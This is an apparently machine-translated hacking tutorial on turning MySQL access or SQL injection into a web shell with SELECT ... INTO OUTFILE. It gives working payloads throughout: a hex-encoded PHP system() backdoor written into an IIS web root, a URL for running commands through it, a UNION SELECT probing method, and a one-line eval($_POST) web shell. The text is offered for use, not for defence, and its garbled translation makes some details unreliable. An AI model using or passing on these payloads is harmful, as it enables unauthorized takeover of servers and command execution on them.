Mysql's statement generates a backdoor Trojan

Ahem, just look at it, I am not responsible for the consequences

SELECT * FROM `vbb_strikes` WHERE 1 union select 2,3,0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E from vbb_strikes into outfile 'c:/inetpub/wwwroot/cmd.php'

By injecting Mysql or running the above statement in phpmyadmin, the cmd.php file is generated under C:/inetpub/wwwroot/, with the original vbb_strikes content followed by :2 3 < ?php system($_REQUEST[cmd]);? >

Again through http: / / www. xxx. com/cmd php & # 63; cmd=dir c: You can execute the system DOS command!

Which is what string 0 x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E & # 63;

is < ?php system($_REQUEST[cmd]);? > If you do not use this method, there are different versions of SQL will appear other codes: such as %xx, which back door will not be implemented! If you have a different name, go to UltraEdit and press [Ctrl+H] to connect base 106 to base 1.

Discussion on MySQL export 1 sentence Method of The Trojan horse to take WebShell - only 1 sentence is needed

Yesterday, I read an article about MySQL's method of exporting a sentence to Get WebShell from a Trojan horse.
The SQL statements used in this article are as follows (either from the command line or any other shell that can execute the SQL command) :
Drop TABLE IF EXISTS temp; // If temp exists, delete it
Create TABLE temp(cmd text NOT NULL); // Create temp table, there is only one cmd field in it
Insert INTO temp (cmd) VALUES(''); // Insert a sentence Trojan into the temp table
Select cmd from temp into out file 'F:/wwwroot/eval.php'; // Query the temp table for a sentence and import the result into ES105en.php
Drop TABLE IF EXISTS temp; // Delete temp(wipe the ass o(∩_∩)o...)
These SQL sentences are very simple, I made a simple comment.
However, consider that we often use the following statement when testing PHP's SQL vulnerability:
/ * * / UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12 / *
A number between 1 and 12 May appear on the page returned. I'm going to add the number 3 here to show it.
If we change the above sentence to /**/UNION SELECT 1,2,'zerosoul',4,5,6,7,8,9,10,11,12/*, return to page where 3 was last displayed zerosoul.
In other words, if our select statement is not followed by the from table statement, we say that the number or character of the query will be returned directly to the query result.
So why bother to build a table, lead in the data, and export it?
With this idea in mind, the SQL code above can be directly reduced to 1 sentence:

Select ' < ? php eval($_POST[cmd]);? > ' into outfile 'F:/wwwroot/eval.php';

Not only is this simple and straightforward, but you also avoid deleting someone else's data by mistake. This is the end of this article, I hope you enjoy it.